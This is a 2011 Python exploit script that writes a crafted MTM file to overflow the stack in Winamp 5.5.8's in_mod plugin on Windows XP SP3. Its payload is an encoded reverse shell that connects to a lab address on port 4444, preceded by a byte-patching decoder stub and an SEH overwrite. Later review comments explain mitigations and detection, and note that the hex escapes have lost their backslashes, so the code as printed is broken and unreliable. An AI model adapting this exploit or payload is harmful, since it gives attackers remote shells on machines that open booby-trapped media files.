Winamp 5.5.8 Stack Overflow
Posted on 08 January 2011
#!/usr/bin/python
# finally got time to finish what I started...
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (SEH)
# WINDOWS XP SP3 EN Fully Patched
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC and Exploit by fdisk
# This POC was already been released here (without proper shellcode): http://www.exploit-db.com/winamp-5-58-from-dos-to-code-execution/
# We later gave up on SEH and went straight for direct EIP overwrite, yesterday I couldn't sleep and decided to finish cooking this version.
# Further References:
# http://www.exploit-db.com/winamp-exploit-part-2/
# http://www.exploit-db.com/exploits/15287/
# Special thanks to Mighty-D, Ryujin and all the Exploit-DB Dev Team.
#
# --- Review notes (defender's reading of this 2011 listing) -----------------
# What the script does: concatenates a fixed MTM (MultiTracker module) header,
# a long filler, an overwritten SEH record (nseh/seh), a small decoder stub and
# an encoded payload, and writes the result to "sploit.mtm". Opening such a
# file in the affected in_mod plugin overflows a stack buffer and lets the
# overwritten exception handler redirect execution (see the references above).
#
# Extraction caveat: every "\x" escape in this listing has lost its backslash
# (e.g. "x4D" where the byte 0x4D was meant), so as printed the string
# literals are plain ASCII text and the script does NOT produce the byte
# sequences the inline comments describe. Treat it as a historical record of
# the technique, not as a runnable tool.
#
# Mitigation / detection: the technique depends on msacm32.drv loading at a
# fixed base and not being SafeSEH-registered (Windows XP SP3); SEHOP, SafeSEH,
# DEP and ASLR on later Windows break the SEH-overwrite step, and updating
# Winamp past the affected 5.5.8 build removes the in_mod defect. The file
# assembled here is roughly 60 KB and is almost entirely 0x90/0x41 filler,
# which is an easy static indicator; winamp.exe opening an outbound TCP
# connection right after loading a module file is the runtime indicator
# (the payload below is a connect-back shell to the author's lab address).
# ----------------------------------------------------------------------------

# Fixed MTM header: "MTM" signature bytes (0x4D 0x54 0x4D), a version byte
# (0x10), the 20-byte song-name field ("SpaceTrack(kosmosis)") and the
# remaining count/size fields of the header. Which of those fields triggers
# the overflow is not stated in this listing.
header = "x4Dx54x4Dx10x53x70x61x63x65x54x72x61x63x6Bx28x6Bx6Fx73x6Dx6Fx73x69x73x29xE0x00x29x39x20xFFx1Fx00x40x0E"
# 16 repeated two-byte values (32 bytes) completing the fixed-size header;
# the author does not document their meaning.
header += "x04x0C" * 16
# Defined but never used below: the payload length is fixed by the pieces
# concatenated into it, not by this constant.
buffersize = 65536 * 2
# 58211 bytes of 0x90 filler that precede the overwritten SEH record.
nopsled = "x90" * 58211
# windows/shell_reverse_tcp LHOST=192.168.33.114 LPORT=4444 (script kiddie unfriendly)
# bad chars: x00x01x02x03x04x05x06x07x08x09x10x11x12x13x0ax0bx0cx0dx0ex0f
# Encoded connect-back payload. After the first few bytes the body consists
# only of printable 0x30-0x5A values, consistent with an alphanumeric encoder
# chosen to avoid the bad-char list above. The decoder stub further down
# presumably repairs the bytes that still could not be expressed directly.
shellcode = ("x89xe1xdaxd7xd9x71xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4dx38x4dx59x43x30"
"x43x30x45x50x43x50x4dx59x4bx55x56x51x58x52x43"
"x54x4cx4bx50x52x50x30x4cx4bx56x32x54x4cx4cx4b"
"x51x42x54x54x43x42x51x38x54x4fx58x37x51"
"x5ax56x46x50x31x4bx4fx56x51x49x50x4ex4cx47x4c"
"x43x51x43x4cx43x32x56x4cx47x50x4fx31x58x4fx54"
"x4dx58x47x5ax42x5ax50x51x42x50x57x4cx4b"
"x51x42x54x50x4cx4bx47x32x47x4cx45x51x4ex30x4c"
"x4bx47x30x43x48x4dx55x4fx30x43x44x50x4a"
"x4ex30x50x50x4cx4bx50x48x54x58x4cx4bx56x38x47"
"x50x43x31x4ex33x4bx53x47x4cx50x49x4cx4bx50x34"
"x4cx4bx43x31x49x46x50x31x4bx4fx49x50x4e"
"x4cx49x51x58x4fx54x4dx43x31x49x57x47x48x4bx50"
"x52x55x4bx44x43x33x43x4dx4cx38x47x4bx43x4dx47"
"x54x54x35x4bx52x51x48x56x38x56x44x43x31"
"x49x43x43x56x4cx4bx54x4cx50x4bx4cx4bx50x58x45"
"x4cx45x51x58x53x4cx4bx54x44x4cx4bx45x51x58x50"
"x4dx59x50x44x56x44x51x4bx51x4bx45x31x56"
"x39x50x5ax56x31x4bx4fx4dx30x56x38x51x4fx50x5a"
"x4cx4bx54x52x5ax4bx4dx56x51x4dx52x48x47x43x50"
"x32x43x30x52x48x52x57x52x53x50x32x51x4f"
"x51x44x52x48x50x4cx54x37x47x56x54x47x4bx4fx49"
"x45x4ex58x4cx50x45x51x43x30x43x30x56x49"
"x51x44x56x30x52x48x56x49x4dx50x52x4bx43x30x4b"
"x4fx58x55x50x50x50x50x50x50x50x50x51x50x56x30"
"x51x50x56x30x52x48x4bx5ax54x4fx4bx50x4b"
"x4fx49x45x4bx39x58x47x43x58x4fx30x4fx58x47x51"
"x54x32x45x38x45x52x43x30x54x51x51x4cx4cx49x5a"
"x46x52x4ax52x30x51x46x45x38x4dx49x4ex45"
"x43x44x45x31x4bx4fx58x55x45x38x43x53x52x4dx45"
"x34x45x50x4bx39x5ax43x56x37x56x37x50x57x56x51"
"x4cx36x52x4ax50x59x51x46x5ax42x4bx4dx45"
"x36x4fx37x51x54x47x54x47x4cx45x51x43x31x4cx4d"
"x51x54x56x44x52x30x49x56x43x30x51x54x51x44x56"
"x30x50x56x50x56x47x36x50x56x50x4ex50x56"
"x51x46x56x33x56x36x52x48x52x59x58x4cx47x4fx4c"
"x46x4bx4fx58x55x4dx59x4bx50x50x4ex50x56"
"x4bx4fx56x50x43x58x45x58x4bx37x45x4dx43x50x4b"
"x4fx58x55x4fx4bx4cx30x4fx45x4ex42x56x36x52x48"
"x4ex46x4cx55x4fx4dx4dx4dx4bx4fx47x4cx43"
"x36x43x4cx45x5ax4dx50x4bx4bx4dx30x43x45x43x35"
"x4fx4bx51x57x45x43x43x42x52x4fx43x5ax45x50x51"
"x43x4bx4fx58x55x45x5a")
# Decoder stub that runs before the encoded payload. Per the author's inline
# comments it derives a pointer from ESP (xor / push-pop / sub / add), then
# steps through the buffer with "sub byte ptr [ebx], imm8" / "inc ebx" pairs,
# patching individual bytes in place; the interleaved "x90" runs are padding.
# The specific constants are tied to the stack layout of the affected build
# and are not explained further in the listing.
prepare_shellcode = "x90" * 40
prepare_shellcode += "x90x33xDB" # xor ebx,ebx
prepare_shellcode += "x54x5B" # push esp - pop ebx
prepare_shellcode += "x81xEBx17xCBxFFxFF" # sub ebx,-34E9
prepare_shellcode += "x83xc3x3B" # add ebx,3B
prepare_shellcode += "x83xEBx22" # sub ebx,22
prepare_shellcode += "x80x2BxDA" # sub byte ptr ds:[ebx],0da
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxDA" # sub byte ptr ds:[ebx],0da
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x90" * 6
prepare_shellcode += "x80x2BxC2" # sub byte ptr ds:[ebx],0c2
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxBE" # sub byte ptr ds:[ebx],0be
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxC1" # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxBF" # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxC8" # sub byte ptr ds:[ebx],0c8
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxB9" # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x90" * 4
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxCA" # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxD9" # sub byte ptr ds:[ebx],0D9
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxB7" # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxB9" # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxC1" # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxBF" # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "x90" * 4
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxBC" # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxD6" # sub byte ptr ds:[ebx],0D6
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxCA" # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxDA" # sub byte ptr ds:[ebx],0da
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxC4" # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x90" * 4
prepare_shellcode += "x80x2BxB6" # sub byte ptr ds:[ebx],0B6
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxC4" # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxBB" # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxB7" # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxD3" # sub byte ptr ds:[ebx],0D3
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x90" * 6
prepare_shellcode += "x80x2BxBB" # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxD8" # sub byte ptr ds:[ebx],0D8
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxB7" # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxD4" # sub byte ptr ds:[ebx],0d4
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxBC" # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxB4" # sub byte ptr ds:[ebx],0B4
prepare_shellcode += "x90" * 6
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxBF" # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxD5" # sub byte ptr ds:[ebx],0D5
prepare_shellcode += "x83xc3x3F" # add ebx,3F
prepare_shellcode += "x83xEBx16" # sub ebx,16
prepare_shellcode += "x80x2BxCC" # sub byte ptr ds:[ebx],0CC
prepare_shellcode += "x43" # inc ebx
prepare_shellcode += "x80x2BxC9" # sub byte ptr ds:[ebx],0C9
# Trailing NOP padding after the decoder.
prepare_shellcode += "x90"*305
# Overwritten "next SEH" pointer: EB 30 is a short forward jump (+0x30),
# followed by two NOPs, so the overwritten record doubles as code.
nseh = "xebx30x90x90"
# Overwritten handler pointer: a pop/pop/ret gadget at a fixed address in
# msacm32.drv. This is the step that SafeSEH registration, SEHOP and ASLR
# defeat on later Windows builds; it is specific to the XP SP3 EN module.
seh = "x3fx28xd1x72" # 0x72D1283F - ppr - msacm32.drv - Windows XP SP3 EN
# 120 bytes of "A" (0x41) padding between the filler and the SEH record.
tail = "x41" * 120
# Final on-disk layout:
#   header | filler | padding | nSEH | SEH | decoder stub | encoded payload | trailing NOPs
payload = header + nopsled + tail + nseh + seh + prepare_shellcode + shellcode + "x90" * 100
# NOTE(review): "w" is text mode; on Windows Python 2 this would rewrite 0x0A
# as CR LF, which only works here because 0x0A is already on the author's
# bad-char list. The name `file` also shadows the Python 2 builtin. Python 2
# syntax throughout (print statement below).
file = open("sploit.mtm", "w")
file.write(payload)
file.close()
print "sploit.mtm file generated successfuly"